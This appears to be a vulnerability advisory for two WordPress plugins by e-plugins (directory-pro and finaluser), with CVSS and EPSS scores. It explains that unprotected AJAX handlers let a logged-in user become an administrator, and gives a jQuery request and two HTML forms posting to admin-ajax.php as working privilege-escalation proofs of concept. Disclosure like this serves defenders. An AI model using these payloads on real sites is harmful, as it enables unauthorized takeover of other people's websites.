8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
16.8%
The plugins, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable.
directory-pro (set current logged in user to admin)
jQuery.ajax({
url: "http://localhost/wp-admin/admin-ajax.php",
method: 'post',
data: {
action: "iv_directories_update_profile_setting",
form_data: `wp_capabilities[administrator]=1`
},
success: function(res){
console.log(res)
}
});
<html>
<body>
<form action="http://[WP]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="iv_directories_update_profile_setting" />
<input type="hidden" name="form_data" value="wp_capabilities[administrator]=1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
finaluser (edit user to set as admin):
<html>
<body>
<form action="http://[WP]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="ep_finaluser_update_user_settings" />
<input type="hidden" name="form_data" value="user_role=administrator&payment_status=success&exp_date=&ep_status=publish&user_id=2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
16.8%